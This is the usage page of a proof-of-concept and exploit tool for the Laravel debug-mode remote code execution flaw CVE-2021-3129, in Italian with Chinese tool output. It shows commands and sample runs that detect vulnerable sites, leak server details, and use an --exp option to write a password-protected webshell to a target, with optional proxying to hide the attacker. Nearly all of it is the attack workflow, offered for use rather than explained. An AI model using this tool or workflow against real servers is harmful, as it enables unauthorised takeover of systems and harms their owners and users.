
Vulnerabilità RCE in modalità debug di Laravel (CVE-2021-3129) poc / exp
CVE-2021-3129 exp / poc
python CVE-2021-3129.py
usage: python CVE-2021-3129.py -u [url] --exp
Laravel Debug mode RCE (CVE-2021-3129) POC & EXP
argomenti opzionali:
-h, --help mostra questo messaggio di aiuto ed esce
-u URL, --url URL specifica l'URL di destinazione
-e, --exp sfrutta la vulnerabilità per scrivere una webshell; se non specificato, esegue solo il rilevamento
-p PROXY, --proxy PROXY
imposta un proxy, ad esempio socks5://127.0.0.1:7890
# poc
python CVE-2021-3129.py -u http://xxxxx.com
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64
# exp
python CVE-2021-3129.py -u http://xxxxx.com --exp
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64
[OK] 成功写入webshell, 访问地址 http://xxxxx.com/shell.php , 密码 whoami
# proxy
python CVE-2021-3129.py -u http://xxxxx.com/ -p socks5://127.0.0.1:7890
python CVE-2021-3129.py -u http://xxxxx.com/ --exp -p socks5://127.0.0.1:7890
Link di riferimento
Note sull'utilizzo